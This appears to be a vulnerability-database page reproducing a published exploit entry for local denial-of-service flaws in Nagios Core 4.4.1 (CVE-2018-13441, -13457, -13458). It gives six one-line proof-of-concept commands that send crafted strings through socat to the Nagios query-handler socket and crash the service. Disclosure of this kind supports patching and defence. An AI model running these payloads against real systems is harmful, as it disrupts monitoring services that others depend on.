| Reporter | Title | Published | Views | Family All 52 |
|---|---|---|---|---|
| Nagios Core 4.4.1 - Denial of Service Vulnerability | 24 Jul 201800:00 | – | zdt | |
| CVE-2018-13441 | 12 Jul 201818:29 | – | alpinelinux | |
| Nagios Core null pointer dereference vulnerability (CNVD-2018-17097) | 13 Jul 201800:00 | – | cnvd | |
| Nagios Core null pointer dereference vulnerability (CNVD-2018-17098) | 13 Jul 201800:00 | – | cnvd | |
| Nagios Core Null Pointer Dereference Vulnerability | 13 Jul 201800:00 | – | cnvd | |
| CVE-2018-13441 | 12 Jul 201818:00 | – | cve | |
| CVE-2018-13457 | 12 Jul 201818:00 | – | cve | |
| CVE-2018-13458 | 12 Jul 201818:00 | – | cve | |
| CVE-2018-13441 | 12 Jul 201818:00 | – | cvelist | |
| CVE-2018-13457 | 12 Jul 201818:00 | – | cvelist |
# Exploit Title: Nagios Core Multiple Local Denial of Service
# Date: 2018-07-09
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.nagios.org/
# Software Link: https://www.nagios.org/downloads/nagios-core/
# Version: 4.4.1 and earlier
# Tested on: 4.4.1
qh_core, qh_help, and qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket.
1. [CVE-2018-13458] qh_core
$ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh -
2. [CVE-2018-13457] qh_echo
$ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh -
3. [CVE-2018-13441] qh_help
$ echo -ne “#help\0" | socat unix-connect:./poc/nagios.qh -
$ echo -ne “@help\0" | socat unix-connect:./poc/nagios.qh -Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation